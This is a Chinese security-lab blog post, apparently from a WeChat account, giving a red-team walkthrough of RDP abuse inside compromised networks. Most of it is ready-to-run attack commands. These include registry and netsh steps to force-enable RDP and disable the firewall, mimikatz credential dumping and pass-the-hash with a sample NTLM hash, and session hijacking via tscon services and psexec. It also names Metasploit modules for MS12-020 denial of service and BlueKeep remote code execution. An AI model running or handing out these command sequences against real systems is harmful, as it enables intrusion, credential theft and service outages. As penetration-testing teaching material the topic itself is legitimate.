点击蓝字 关注我们
日期:2021-09-14
作者:hdsec
介绍:内网渗透中常见
RDP的利用方式。
0x00 前言
简单整理一下内网渗透中常见的RDP利用方式。
0x01 爆破RDP口令
(1)超级弱口令检测工具。
(2)hydra、python脚本等。
0x02 强制开启RDP服务
2.1 查看目标是否开启RDP
(1)查看注册表
REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections十六进制0x1 关闭,十六进制 0x0 开启:
(2)扫描端口
namp -p 3389 10.211.55.4
(3)查看端口、进程
tasklist /svc | find "TermService"netstat -ano | find "3389"
2.2 强制开启RDP
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
如果目标开启了防火墙,还需要配置防火墙为允许远程桌面连接。
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
或者直接关闭防火墙:
netsh advfirewall set allprofiles state off(2)使用metasploit启动 首先要获取目标一个session,然后使用后渗透模块post/windows/manage/enable_rdp 开启远程连接。
(3)使用cs插件启动。
0x03 PTH 登录远程 RDP
当遇到目标主机无法通过lsass.exe进程抓取明文密码,或者是密码强度太大经常会遇到拿到hash却解不开的情况,我们就可以采用凭据传递攻击(Pass-The-Hash)。
新版的RDP远程桌面协议中有一个“受限管理员”(Restricted Admin)的特性,通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。所以在开启凭据传递攻击(Pass-The-Hash)前,要先确保目标主机开启了Restricted Admin Mode,开启后我们便可以使用Hash来直接实现RDP远程登录。
3.1 Mimikatz
(1) 修改注册表
我们在渗透过程中可以通过修改注册表的方式开启目标主机的Restricted Admin Mode,值为0代表开启,值为1代表关闭:
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f查看是否成功开启。
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"
(2) 在目标主机win2012上运行mimikatz获取NTLM。
privilege::debugsekurlsa::logonpasswords
(3) 在win10攻击机上执行命令,可成功利用mimikatz传递hash远程连接 windows2012。
privilege::debugsekurlsa::pth /user:administrator /domain:127.0.0.1 /ntlm:781fd284a63ba30ef7a09a68a3a96fe8 "/run:mstsc.exe /restrictedadmin"
坑点:win7不支持Restricted Admin mode。
3.2 FreeRDP
https://labs.portcullis.co.uk/download/FreeRDP-pth.tar.gz
旧版本下载需要编译。
0x04 RDP 会话劫持
Mimikatz导出用户明文口令时,我们可以通过会话劫持的方式切换至另一用户的桌面。前提是我们要先获取目标主机的SYSTEM权限,再劫持目标用户的RDP并切换过去。4.1 利用系统服务
提权至system权限后激活并登录guest用户。
net user guest /active:yesnet user guest LS123456!net localgroup administrators guest /add
quser 显示有关远程桌面会话主机上的用户会话的信息。
创建劫持用户会话的服务。
sc create hdsec1 binpath= "cmd.exe /k tscon 1 /dest:console"net start hdsec1
执行net start hdsec1命令后,我们创建的劫持会话的服务将会启动,就会切换至ID=1,也就是用户名hacker的会话下。
4.2 Psexec
使用 Psexec 获得一个SYSTEM权限的cmd(前提是 Psexec.exe 以system权限运行),然后再这个SYSTEM权限的cmd中直接执行tscon 2劫持会话。
psexec -s -i cmdqusertscon 2 /dest:console
0x05 RDP 系列漏洞
5.1 MS12-020
MS12-020漏洞是微软在12年发布的一个windows系统漏洞,该漏洞针对于windows xp和windows sever 2003等系统。攻击者通过该漏洞对目标主机进行攻击,可导致目标主机蓝屏。
在msf中使用命令search ms12-020进行搜索。
使用扫描模块auxiliary/scanner/rdp/ms12_020_check进行检测。
auxiliary/dos/windows/rdp/ms12_020_maxchannelids,可成功导致目标主机蓝屏重启。
5.2 CVE-2019-0708
当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时,远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。
靶机:Windows7 SP1 下载链接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/在msf中利用模块exploit/windows/rdp/cve_2019_0708_bluekeep_rce进行漏洞利用,可成功获得meterpreter会话。
坑点:靶机是在VMware workstation 14版本下搭建的,但是在set target的时候设置3靶机会蓝屏,设置成4可成功获取meterpreter会话,漏洞利用环境比较苛刻,在实战中意义不大,容易导致目标蓝屏。
0x06 总结
以上实验操作都是在理想的情况下进行的,在实战中难免会遇到杀软或者windows高版本已经打补丁的情况,这时候就需要一些免杀处理技术或者进行一些骚操作。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
宸极实验室
宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。
团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。
本文始发于微信公众号(宸极实验室):『红蓝对抗』内网渗透中 RDP 的那些事儿
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论